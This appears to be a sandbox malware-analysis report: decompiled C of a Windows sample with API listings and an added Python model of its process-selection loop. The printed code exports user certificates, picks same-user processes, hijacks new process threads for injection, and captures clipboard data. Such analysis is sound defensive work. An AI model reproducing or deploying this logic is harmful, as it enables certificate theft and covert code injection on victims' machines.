            							_t40 = E004103ED(_t39); // HeapAlloc(size)
            						} else {
            							_t40 = 0;
            						}
            						_v924.wDayOfWeek = _t40;
            						if(_t40 != 0) {
            							_push(4);
            							_push(0);
            							_push( &(_v924.wHour));
            							_push( &_v924);
            							_push(_v928);
            							if( *_t77() != 0) { // second call writes the PFX blob into the buffer
            								_t67 =  &_v844;
            								E004107C1(_t43 | 0xffffffff, L"MY", _t67);
            								CharLowerW(_t67);
            								GetSystemTime( &_v924);
            								_t78 =  &_v908;
            								E0040F369(0x80, _t78);
            								E00409F84( &_v588, L"MY");
            								_push(_v924.wYear & 0x0000ffff);
            								_push(_v924.wMonth & 0x0000ffff);
            								_push(_v924.wDay & 0x0000ffff);
            								_push( &_v844);
            								_push( &_v588);
            								_push(_t78);
            								_t68 = 0x3e;
            								if(E004111A5(_t78, _t68,  &_v716) > 0 && E0040D77B(L"MY", _t68, 2, L"MY",  &_v716, _v940, _v944) != 0) { // name built from "my" + date, then the PFX blob (_v940, _v944) is handed on; the sink is not visible in this function
            									_v949 = 1;
            								}
            							}
            						E00410418(_v940); // free the PFX buffer
            						}
            					}
            					goto L15;
            				}
            				goto L4;
            			}

            APIs
            • CertOpenSystemStoreW.CRYPT32(00000000,00402014), ref: 00409FFD
            • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040A019
            • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040A025
            • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040A062
            • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040A09A
            • CharLowerW.USER32(?,?,?,00000001), ref: 0040A0B8
            • GetSystemTime.KERNEL32(?,?,?,?,00000001), ref: 0040A0C3
              • Part of subcall function 004103ED: HeapAlloc.KERNEL32(00000008,-00000004,00411BB4,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 004103F9
            • CertCloseStore.CRYPT32(?,00000000), ref: 0040A14C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CertStore$CertificatesEnumExportSystem$AllocCharCloseHeapLowerOpenTime
            • String ID:
            • API String ID: 3339301666-0
            • Opcode ID: c3f352f38bc916b98d38fbf18ee1be4fc058f41b8498e8bdad68366fedb35cdb
            • Instruction ID: dbc4ab35c3e2d5bfe5da6efe3f5af33bbf8d3252b6eaa7a60860ca1ff7d30bfa
            • Opcode Fuzzy Hash: c3f352f38bc916b98d38fbf18ee1be4fc058f41b8498e8bdad68366fedb35cdb
            • Instruction Fuzzy Hash: DA41A472108345AAD7119F658D84AAB7BDCAB88344F00093FFAC4F21E1D678D9588767
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E00404D06() {
            				char _v5;
            				signed int _v12;
            				signed int _v16;
            				void* _v20;
            				int _v24;
            				void* _v28;
            				char _v32;
            				long _v588;
            				void* _v596;
            				void* __esi;
            				void* _t42;
            				int _t46;
            				signed int _t48;
            				void* _t49;
            				long _t57;
            				intOrPtr* _t58;
            				void** _t60;
            				void** _t61;
            				void** _t63;
            				long _t66;
            				int _t72;
            				void** _t73;
            				void* _t74;
            
            				_t72 = 0;
            				_v5 = 0;
            				_v16 = 0;
            				_v12 = 0;
            				while(1) {
            					_t42 = CreateToolhelp32Snapshot(2, _t72); // TH32CS_SNAPPROCESS
            					_v20 = _t42;
            					_v24 = _t72;
            					if(_t42 == 0xffffffff) {
            						break;
            					} else {
            						_push( &_v596);
            						_v596 = 0x22c; // dwSize = sizeof(PROCESSENTRY32W)
            						_t46 = Process32FirstW(_v20);
            					}
            					while(_t46 != 0) {
            						_t66 = _v588;
            						__eflags = _t66 - _t72;
            						if(_t66 <= _t72) {
            							L20:
            							_t46 = Process32NextW(_v20,  &_v596);
            							continue;
            						}
            						__eflags = _t66 -  *0x41a504; // skip the sample's own process id
            						if(__eflags == 0) {
            							goto L20;
            						}
            						_t48 = 0;
            						__eflags = _v12 - _t72;
            						if(_v12 <= _t72) { // _v12: number of pids already handled (array _v16), scanned at L6 below
            							L8:
            							_t49 = E00403C5D(_t66, _t71, _t66);
            							_v28 = _t49;
            							__eflags = _t49 - _t72;
            							if(_t49 == _t72) {
            								goto L20;
            							}
            							_t74 = OpenProcess(0x400, _t72, _v588); // PROCESS_QUERY_INFORMATION: enough to read the token
            							__eflags = _t74 - _t72;
            							if(_t74 == _t72) {
            								L19:
            								CloseHandle(_v28);
            								goto L20;
            							}
            							_t73 = E00411A2C(_t66, _t74,  &_v32); // read the process token's user SID (and a second value into _v32)
            							CloseHandle(_t74);
            							__eflags = _t73;
            							if(_t73 == 0) {
            								L18:
            								_t72 = 0;
            								__eflags = 0;
            								goto L19;
            							} else {
            								__eflags = _v32 -  *0x41a2a0; // must equal the sample's own value
            								if(__eflags == 0) {
            									_t57 = GetLengthSid( *_t73); // same SID length as the sample's own token user ...
            									__eflags = _t57 -  *0x41a298;
            									if(_t57 ==  *0x41a298) {
            										_t58 =  *0x41a294; // 0x0
            										_t60 = E00410489( *_t58,  *_t73, _t57); // ... and same SID bytes: only processes running as the same user are selected
            										__eflags = _t60;
            										if(_t60 == 0) {
            											_t61 = E004103A8(4 + _v12 * 4,  &_v16);
            											__eflags = _t61;
            											if(_t61 != 0) {
            												_t71 = _v12;
            												_v12 = _v12 + 1;
            												_v24 = _v24 + 1;
            												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
            												_t63 = E00404C7D(_v16, _v588, _v28); // act on the selected pid (E00404C7D is not shown here)
            												__eflags = _t63;
            												if(_t63 != 0) {
            													_v5 = 1;
            												}
            											}
            										}
            									}
            								}
            								E00410418(_t73);
            								goto L18;
            							}
            						} else {
            							goto L6;
            						}
            						while(1) {
            							L6:
            							_t71 = _v16;
            							__eflags =  *((intOrPtr*)(_t71 + _t48 * 4)) - _t66;
            							if( *((intOrPtr*)(_t71 + _t48 * 4)) == _t66) {
            								goto L20;
            							}
            							_t48 = _t48 + 1;
            							__eflags = _t48 - _v12;
            							if(_t48 < _v12) {
            								continue;
            							}
            							goto L8;
            						}
            						goto L20;
            					}
            					CloseHandle(_v20);
            				if(_v24 != _t72) { // take a fresh snapshot while the previous pass found new processes
            						continue;
            					}
            					break;
            				}
            				E00410418(_v16);
            				return _v5;
            			}
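E00404D06 decides which processes the sample acts on: it snapshots the process list, skips its own pid and every pid it has already handled, opens each remaining process with PROCESS_QUERY_INFORMATION, reads the token user SID, and accepts only processes whose SID has the same length and the same bytes as its own; after any pass that found something new it takes a fresh snapshot and repeats, so processes started during the run are picked up until a pass comes back empty. The Python below is an added model of that selection loop, not the sample's code and not a Windows API call; it is useful for reasoning about which processes on a host would be touched. `ProcInfo`, `select_new_targets()` and `inject_all()` are this example's names, the SID values are constructed byte strings standing in for binary SIDs, the per-process value compared with *0x41a2a0 is modelled as `session` (its meaning is an assumption), and the per-pid precheck E00403C5D is not modelled.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcInfo:
    """One PROCESSENTRY32W row plus the token data E00411A2C fetches.

    user_sid stands in for the binary token-user SID (constructed bytes here);
    session is the per-process value the sample compares with *0x41a2a0 (an
    assumption of this example, not something the decompile names).
    """
    pid: int
    user_sid: bytes
    session: int


def select_new_targets(snapshot, self_pid, self_sid, self_session, done):
    """One pass of the Process32FirstW/Process32NextW loop in E00404D06.

    `done` plays the role of the _v16 pid array; the pids appended to it
    during this pass are returned (the sample counts them in _v24).
    """
    added = []
    for proc in snapshot:
        if proc.pid <= 0 or proc.pid == self_pid:      # th32ProcessID > 0 and != *0x41a504
            continue
        if proc.pid in done:                           # linear scan of _v16 (label L6)
            continue
        if proc.session != self_session:               # _v32 != *0x41a2a0
            continue
        # GetLengthSid() first, then E00410489 compares the bytes: only a process
        # whose token user is the same account as the sample's is selected.
        if len(proc.user_sid) != len(self_sid) or proc.user_sid != self_sid:
            continue
        done.append(proc.pid)
        added.append(proc.pid)
    return added


def inject_all(snapshots, self_pid, self_sid, self_session):
    """The outer while(1): re-snapshot while the previous pass found new pids.

    `snapshots` yields one process list per CreateToolhelp32Snapshot call;
    once it is exhausted the last list is reused, i.e. the system has stopped
    changing.  Returns (pids selected, in order; number of snapshots taken).
    """
    done = []
    passes = 0
    it = iter(snapshots)
    current = next(it)
    while True:
        passes += 1
        if not select_new_targets(current, self_pid, self_sid, self_session, done):
            return done, passes
        current = next(it, current)


# Constructed host state; the SIDs are textual stand-ins for binary SIDs.
USER_SID = b"S-1-5-21-1111-2222-3333-1001"
OTHER_USER_SID = b"S-1-5-21-1111-2222-3333-1002"
SYSTEM_SID = b"S-1-5-18"

SNAPSHOT_1 = [
    ProcInfo(4, SYSTEM_SID, 0),          # System: different SID length, skipped
    ProcInfo(640, SYSTEM_SID, 0),        # a service, skipped for the same reason
    ProcInfo(1200, USER_SID, 1),         # same user, same session value: selected
    ProcInfo(1300, OTHER_USER_SID, 1),   # same SID length, different bytes: skipped
    ProcInfo(1400, USER_SID, 1),         # the sample itself: skipped
    ProcInfo(1500, USER_SID, 2),         # same user, other session value: skipped
]
SNAPSHOT_2 = SNAPSHOT_1 + [ProcInfo(1600, USER_SID, 1)]   # started mid-run: picked up on the rescan


def demo():
    return inject_all([SNAPSHOT_1, SNAPSHOT_2], self_pid=1400,
                      self_sid=USER_SID, self_session=1)


if __name__ == "__main__":
    pids, passes = demo()
    print("selected pids:", pids, "after", passes, "snapshots")
```

The practical consequence of the SID filter is that no elevation is needed for this step: the sample only ever opens processes it already owns, and a process of another user or of a service account is never a candidate regardless of its privileges.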

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404D27
            • Process32FirstW.KERNEL32(?,?), ref: 00404D4F
            • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,00000000), ref: 00404DA9
            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00404DC6
            • GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 00404DD9
            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404E46
            • Process32NextW.KERNEL32(?,0000022C), ref: 00404E52
            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404E62
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
            • String ID:
            • API String ID: 1981844004-0
            • Opcode ID: 369542b11766d6424d5851c6e019376f8857cef6f7fdc2e87e5c3f6637496cd1
            • Instruction ID: 4643b66a8e214e9c13321d57bf3fe8223af9f4886db32d22fca3ed06bcf55dfe
            • Opcode Fuzzy Hash: 369542b11766d6424d5851c6e019376f8857cef6f7fdc2e87e5c3f6637496cd1
            • Instruction Fuzzy Hash: D34162B1900119AFCF21EFA5CC84AEEBB75FFC5305F1005AAE615B32A1D7395981CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00411ADE(WCHAR* _a4) {
            				void* _v12;
            				intOrPtr _v16;
            				struct _TOKEN_PRIVILEGES _v28;
            				int _t23;
            
            				_t23 = 0;
            				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
            					_v28.PrivilegeCount = 1;
            					_v16 = 2;
            					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
            						_t23 = 1;
            					}
            					CloseHandle(_v12);
            					return _t23;
            				} else {
            					return 0;
            				}
            			}

            APIs
            • GetCurrentThread.KERNEL32 ref: 00411AEE
            • OpenThreadToken.ADVAPI32(00000000), ref: 00411AF5
            • OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 00411B07
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00411B2B
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00411B40
            • GetLastError.KERNEL32 ref: 00411B4A
            • CloseHandle.KERNEL32(?), ref: 00411B59
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
            • String ID:
            • API String ID: 2724707430-0
            • Opcode ID: 0087c70a0c2657f0201c7e220bb7e5f7079aa5b5a04956fa9d824f59dd3897f2
            • Instruction ID: 6c60eaf9677207f317200d55daea23e9e7311101372178ac77fe26de3629aa2c
            • Opcode Fuzzy Hash: 0087c70a0c2657f0201c7e220bb7e5f7079aa5b5a04956fa9d824f59dd3897f2
            • Instruction Fuzzy Hash: F7011E75604208BFEB109FE1ED89EEF7BBCEB15354F004066F602E2170E73499859A38
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E00404A40(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
            				struct _CONTEXT _v720;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t33;
            				void* _t37;
            				void* _t38;
            				void** _t46;
            				void* _t47;
            				void* _t48;
            				void** _t51;
            				void* _t53;
            				void* _t54;
            				signed int _t56;
            				void* _t66;
            
            				_t48 = __edx;
            				E00403E2A();
            				_t46 = _a4;
            				_t33 =  *0x41a2b4(_t46, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
            				_a40 = _t33;
            				if(_t33 >= 0 && (_a32 & 0x00000001) != 0 && _t46 != 0 && _a8 != 0 && E00403E39() != 0 && GetProcessId( *_t46) != 0) {
            					_t37 = E00403C5D(_t47, _t48, _t36);
            					_a44 = _t37;
            					_t64 = _t37;
            					if(_t37 != 0) {
            						_push(_t53);
            						_t38 = E00403D3B(_t47,  *_t46, _t53, _t64, _t37, 0);
            						_t51 = _a8;
            						_t54 = _t38;
            						_a32 = _t54;
            						_t56 = _t54 -  *0x41a2a4 + E00404356;
            						_v720.ContextFlags = 0x10003;
            						if(GetThreadContext( *_t51,  &_v720) == 0) {
            							L12:
            							VirtualFreeEx( *_t46, _a32, 0, 0x8000);
            						} else {
            							_t66 = _v720.Eip -  *0x41a2bc; // 0x774cba60
            							if(_t66 != 0) {
            								goto L12;
            							} else {
            								if(( *0x41a290 & 0x00000008) != 0) {
            									_t56 = _t56 ^ _v720.Eax;
            								}
            								_v720.Eax = _t56;
            								_v720.ContextFlags = 0x10002;
            								if(SetThreadContext( *_t51,  &_v720) == 0) {
            									goto L12;
            								}
            							}
            						}
            						CloseHandle(_a44);
            					}
            				}
            				return _a40;
            			}

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
            • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00404A71
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • GetProcessId.KERNEL32(?), ref: 00404AAD
              • Part of subcall function 00403C5D: CreateMutexW.KERNEL32(0041A2C8,00000001,00000000,0041A50C,?,?,00000002,?), ref: 00403CAC
            • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00404AFF
            • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00404B3F
            • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00404B55
            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B5E
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ContextCreateObjectProcessSingleThreadWait$CloseFreeHandleMutexUserVirtual
            • String ID:
            • API String ID: 3545650457-0
            • Opcode ID: 1323c8c917bd89d7b08198baa0c19d386b7bd6ce498f7d807996149312b5069b
            • Instruction ID: b10a16ddd4d2317af295e0f180d180b9b96be2f21529240136dd57cd9b6965b8
            • Opcode Fuzzy Hash: 1323c8c917bd89d7b08198baa0c19d386b7bd6ce498f7d807996149312b5069b
            • Instruction Fuzzy Hash: 1C315C71801219ABDF119F65CD48BDA7BB9BF48344F0441A6FE08B62A0C779E950CF58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CryptAcquireContextW.ADVAPI32(00415D8D,00000000,00000000,00000001,F0000040,00000000,00415D8D,?,00000030,?,?,?,004162B0,?), ref: 00411799
            • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,004162B0,?), ref: 004117B1
            • CryptHashData.ADVAPI32(?,00000010), ref: 004117CC
            • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 004117E3
            • CryptDestroyHash.ADVAPI32(?), ref: 004117FA
            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,004162B0,?), ref: 00411804
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
            • String ID:
            • API String ID: 3186506766-0
            • Opcode ID: 676bb2171356b531c7bbb4ff1ad55c716f430b18c5059675bca8e2cffe408d23
            • Instruction ID: 594a383f6d8fa77db36cdc1e291955084bacb3509496565f58e63fc419ad1755
            • Opcode Fuzzy Hash: 676bb2171356b531c7bbb4ff1ad55c716f430b18c5059675bca8e2cffe408d23
            • Instruction Fuzzy Hash: 0F11157590024DBFEF119FA4CD88FEEBB7CEB04384F008065B661B12B0D77689949B28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E0040CEC4(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
            				char _v5;
            				signed int _v12;
            				char _v20;
            				char _v64;
            				char _v552;
            				char _v556;
            				short _v588;
            				void* __ebx;
            				void* __esi;
            				signed int _t62;
            				signed int _t64;
            				signed int _t65;
            				signed short _t71;
            				signed short _t75;
            				void* _t92;
            				void* _t95;
            				void* _t97;
            				signed short _t99;
            				void* _t100;
            				void* _t101;
            				void* _t102;
            				void* _t103;
            				void* _t104;
            				void* _t105;
            				void* _t109;
            				signed int _t111;
            				char* _t112;
            				void* _t113;
            
            				_t109 = __edx;
            				_t106 = __ecx;
            				_t111 = _a4;
            				_t99 = 1;
            				_v5 = 0;
            				if( *_t111 == 0) {
            					_t97 = E00415DA2();
            					 *_t111 = _t97;
            					if(_t97 == 0) {
            						return 0;
            					}
            					_v5 = 1;
            				}
            				__eflags = _a8 & 0x00000001;
            				if((_a8 & 0x00000001) == 0) {
            					L9:
            					__eflags = _a8 & 0x00000002;
            					if((_a8 & 0x00000002) != 0) {
            						_push( &_v12);
            						_push(0x20000);
            						_push(0x2713);
            						_t105 = 4;
            						_v12 = 0x2000800;
            						_t99 = E00415DBE(_t111, _t105);
            					}
            					L11:
            					__eflags = _a8 & 0x00000004;
            					if((_a8 & 0x00000004) == 0) {
            						L16:
            						__eflags = _t99;
            						if(_t99 == 0) {
            							L32:
            							__eflags = _v5 - 1;
            							if(_v5 == 1) {
            								E00410418( *_t111);
            								 *_t111 =  *_t111 & 0x00000000;
            								__eflags =  *_t111;
            							}
            							L34:
            							return _t99;
            						}
            						__eflags = _a8 & 0x00000008;
            						if((_a8 & 0x00000008) == 0) {
            							L20:
            							__eflags = _t99;
            							if(_t99 == 0) {
            								goto L32;
            							}
            							__eflags = _a8 & 0x00000010;
            							if((_a8 & 0x00000010) == 0) {
            								L28:
            								__eflags = _t99;
            								if(_t99 == 0) {
            									goto L32;
            								}
            								__eflags = _a8 & 0x00000020;
            								if((_a8 & 0x00000020) != 0) {
            									E0040CE08(_t106, _t111, 2);
            									E0040CE08(_t106, _t111, 0x17);
            								}
            								goto L34;
            							}
            							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
            							_a4 = _t62;
            							__eflags = _t62;
            							if(_t62 > 0) {
            								__eflags = 0;
            								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
            								_t106 =  &_v588;
            								_t99 = E00415E6B(_t62,  &_v588, _t109, 0, _t111, 0x271e);
            							}
            							_a4 = 0x104;
            							__eflags = _t99;
            							if(_t99 == 0) {
            								goto L32;
            							} else {
            								_push( &_a4);
            								_t64 =  &_v588;
            								_push(_t64);
            								_push(2);
            								L00416BB0();
            								__eflags = _t64;
            								if(_t64 != 0) {
            									_t65 = _a4;
            									__eflags = _t65;
            									if(_t65 > 0) {
            										__eflags = 0;
            										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
            										_t106 =  &_v588;
            										_t99 = E00415E6B(_t65,  &_v588, _t109, 0, _t111, 0x271f);
            									}
            								}
            								goto L28;
            							}
            						}
            						_t112 =  &_v20;
            						E0040F48A(_t112);
            						_push(_t112);
            						_push(0x20000);
            						_push(0x271c);
            						_t100 = 6;
            						_t71 = E00415DBE(_a4, _t100);
            						_t99 = _t71;
            						__eflags = _t99;
            						if(_t99 == 0) {
            							_t111 = _a4;
            							goto L32;
            						}
            						__imp__GetUserDefaultUILanguage();
            						_v12 = _t71 & 0x0000ffff;
            						_push( &_v12);
            						_push(0x20000);
            						_push(0x271d);
            						_t101 = 2;
            						_t75 = E00415DBE(_a4, _t101);
            						_t111 = _a4;
            						_t99 = _t75;
            						goto L20;
            					}
            					__eflags = _t99;
            					if(_t99 == 0) {
            						goto L32;
            					}
            					_v12 = E0041051A();
            					_push( &_v12);
            					_push(0x20000);
            					_push(0x2719);
            					_t102 = 4;
            					_t99 = E00415DBE(_t111, _t102);
            					__eflags = _t99;
            					if(_t99 == 0) {
            						goto L32;
            					}
            					_v12 = E00410542();
            					_push( &_v12);
            					_push(0x20000);
            					_push(0x271b);
            					_t103 = 4;
            					_t99 = E00415DBE(_t111, _t103);
            					__eflags = _t99;
            					if(_t99 == 0) {
            						goto L32;
            					}
            					_v12 = GetTickCount();
            					_push( &_v12);
            					_push(0x20000);
            					_push(0x271a);
            					_t104 = 4;
            					_t99 = E00415DBE(_t111, _t104);
            					goto L16;
            				}
            				_t92 = E00403E7C(_t106,  &_v556);
            				_t106 =  &_v552;
            				_t99 = E00415E6B(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
            				__eflags = _t99;
            				if(_t99 == 0) {
            					goto L11;
            				}
            				_t95 = E00403FDC( &_v552,  &_v64);
            				__eflags = _v64;
            				if(__eflags != 0) {
            					_t106 =  &_v64;
            					_t99 = E00415E6B(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
            				}
            				__eflags = _t99;
            				if(_t99 == 0) {
            					goto L11;
            				}
            				goto L9;
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 0040CFC3
            • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 0040D016
              • Part of subcall function 00415DA2: HeapAlloc.KERNEL32(00000008,00000034,00416168,?,00000000,?), ref: 00415DAC
            • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 0040D058
            • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040D09A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: NameUser$AllocCountDefaultFileHeapLanguageModuleTick
            • String ID:
            • API String ID: 2013068177-3916222277
            • Opcode ID: e46572505a966a60fc974644d29ccb132f76c4628cc180b913b50531380d877d
            • Instruction ID: 320ba528d354d06faa93b92cc32402c03688d99dc793a61efda6847a831f2eac
            • Opcode Fuzzy Hash: e46572505a966a60fc974644d29ccb132f76c4628cc180b913b50531380d877d
            • Instruction Fuzzy Hash: F151FF31A41344B9DB20DB65D849FDE7BA89F51708F04806BF948BF2C2D7798AC9CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E0040BCEA(void* _a4) {
            				signed int _t12;
            				void* _t22;
            				void* _t24;
            				void* _t25;
            				int _t26;
            
            				E00403E2A();
            				_t26 = _a4;
            				_t24 = GetClipboardData(_t26);
            				_a4 = _t24;
            				if(E00403E39() == 0) {
            					return _t24;
            				}
            				if(_t24 == 0 || _t26 != 1 && _t26 != 0xd && _t26 != 7) {
            					L20:
            					return _a4;
            				} else {
            					_t22 = GlobalLock(_t24);
            					if(_t22 == 0) {
            						L19:
            						goto L20;
            					}
            					_t12 = _t26 - 1;
            					if(_t12 == 0) {
            						_push(_t22);
            						_push(0);
            						L12:
            						_t25 = E0041065D(_t12 | 0xffffffff);
            						L15:
            						if(_t25 != 0) {
            							EnterCriticalSection(0x41aa48);
            							E0040B9DA(0x40214c);
            							E0040B9DA(_t25);
            							LeaveCriticalSection(0x41aa48);
            							if(_t25 != _t22) {
            								E00410418(_t25);
            							}
            						}
            						GlobalUnlock(_a4);
            						goto L19;
            					}
            					_t12 = _t12 - 6;
            					if(_t12 == 0) {
            						_push(_t22);
            						_push(1);
            						goto L12;
            					}
            					if(_t12 != 6) {
            						_t25 = _a4;
            					} else {
            						_t25 = _t22;
            					}
            					goto L15;
            				}
            			}

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
            • GetClipboardData.USER32 ref: 0040BCF8
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • GlobalLock.KERNEL32 ref: 0040BD2C
            • EnterCriticalSection.KERNEL32(0041AA48,00000000,00000000), ref: 0040BD6C
            • LeaveCriticalSection.KERNEL32(0041AA48,00000000,0040214C), ref: 0040BD83
            • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0040BD96
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalGlobalObjectSectionSingleWait$ClipboardDataEnterLeaveLockUnlock
            • String ID:
            • API String ID: 2045610074-0
            • Opcode ID: 1093fdc7397d66979a419b090d22458854e31252a9f5e80cf63fdfb6bfb62878
            • Instruction ID: e0e2c5f222946566b10c26ceb5e59227d2245b7b829b3bafcb8af806f150a66b
            • Opcode Fuzzy Hash: 1093fdc7397d66979a419b090d22458854e31252a9f5e80cf63fdfb6bfb62878
            • Instruction Fuzzy Hash: C5115936500005B7C6213F299984ABFBB59DF91361B14413BFA09B73E1CB7C8C4242EE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00415B2D(WCHAR* __ecx, void* __eflags) {
            				struct _WIN32_FIND_DATAW _v596;
            				short _v1116;
            				WCHAR* _t38;
            				void* _t42;
            
            				_t38 = __ecx;
            				if(E00415D45(0x4034fc,  &_v1116, __ecx) == 0) {
            					L9:
            					SetFileAttributesW(_t38, 0x80);
            					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
            				}
            				_t42 = FindFirstFileW( &_v1116,  &_v596);
            				if(_t42 == 0xffffffff) {
            					goto L9;
            				} else {
            					goto L2;
            				}
            				do {
            					L2:
            					if(E00415A06( &(_v596.cFileName)) == 0 && E00415D45( &(_v596.cFileName),  &_v1116, _t38) != 0) {
            						_t51 = _v596.dwFileAttributes & 0x00000010;
            						if((_v596.dwFileAttributes & 0x00000010) == 0) {
            							E004158D7( &_v1116);
            						} else {
            							E00415B2D( &_v1116, _t51);
            						}
            					}
            				} while (FindNextFileW(_t42,  &_v596) != 0);
            				FindClose(_t42);
            				goto L9;
            			}

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00415B5E
            • FindNextFileW.KERNEL32(00000000,?), ref: 00415BB9
            • FindClose.KERNEL32(00000000), ref: 00415BC4
